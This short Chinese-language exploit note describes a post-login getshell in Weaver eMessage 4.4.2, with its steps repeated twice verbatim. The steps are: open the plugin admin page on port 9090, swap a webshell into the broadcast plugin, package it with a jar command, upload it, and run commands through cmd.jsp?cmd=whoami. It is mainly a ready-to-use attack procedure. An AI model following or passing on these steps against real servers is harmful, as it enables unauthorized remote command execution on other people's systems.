泛微emessage4.4.2后台getshell
- 需登陆后台
漏洞地址:
http://ip:9090/plugin-admin.jsp
上传的插件可以在http://ip:9090/plugins/插件名/ 访问到
我们使用broadcast这个插件,替换web目录下的内容为我们的webshell
使用jar -cvfM0 broadcast ./命令打包成jar进行上传
访问http://ip:9090/plugins/broadcast/cmd.jsp?cmd=whoami
漏洞地址:
http://ip:9090/plugin-admin.jsp
上传的插件可以在http://ip:9090/plugins/插件名/ 访问到
我们使用broadcast这个插件,替换web目录下的内容为我们的webshell
使用jar -cvfM0 broadcast ./命令打包成jar进行上传
访问http://ip:9090/plugins/broadcast/cmd.jsp?cmd=whoami
